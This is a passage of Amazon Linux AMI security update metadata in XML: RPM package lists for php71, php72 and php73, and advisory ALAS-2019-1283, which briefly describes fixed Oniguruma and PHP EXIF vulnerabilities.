arch="x86_64"><filename>Packages/php72-pdo-7.2.16-1.11.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.16" 
release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.16" release="1.11.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-odbc-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.16" release="1.11.amzn1" 
epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.16" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.16-1.11.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.4" release="1.14.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.4" 
release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.4-1.14.amzn1.i686.rpm</filename></package><package 
name="php73-process" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.4" 
release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.4" release="1.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-soap-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.4-1.14.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.4-1.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1283</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1283: low priority package update for php71 php73</title><issued date="2019-09-13 22:53:00" /><updated date="2019-09-18 21:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-13224:
A use-after-free in onig_new_deluxe() in regext.c in Oniguruma 6.9.2 allows attackers to potentially cause information disclosure, denial of service, or possibly code execution by providing a crafted regular expression. The attacker provides a pair of a regex pattern and a string, with a multi-byte encoding that gets handled by onig_new_deluxe(). Oniguruma issues often affect Ruby, as well as common optional libraries for PHP and Rust.
1728970:
CVE-2019-13224 oniguruma: use-after-free in onig_new_deluxe() in regext.c
CVE-2019-11042:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8, it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1739465:
CVE-2019-11042 php: heap buffer over-read in exif_process_user_comment()
CVE-2019-11041:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.31, 7.2.x below 7.2.21 and 7.3.x below 7.3.8, it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or a crash.
1739459:
CVE-2019-11041 php: heap buffer over-read in exif_scan_thumbnail()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11041" title="" id="CVE-2019-11041" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11042" title="" id="CVE-2019-11042" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13224" title="" id="CVE-2019-13224" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-embedded" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.31" release="1.41.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-bcmath-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-common" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package 
name="php71-gmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.31" release="1.41.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-cli-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.31-1.41.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71" version="7.1.31" release="1.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.31" release="1.41.amzn1" epoch="0" 
arch="i686"><filename>Packages/php71-snmp-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.31" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.31-1.41.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.8" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.8-1.18.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.8" release="1.18.amzn1" epoch="0" 
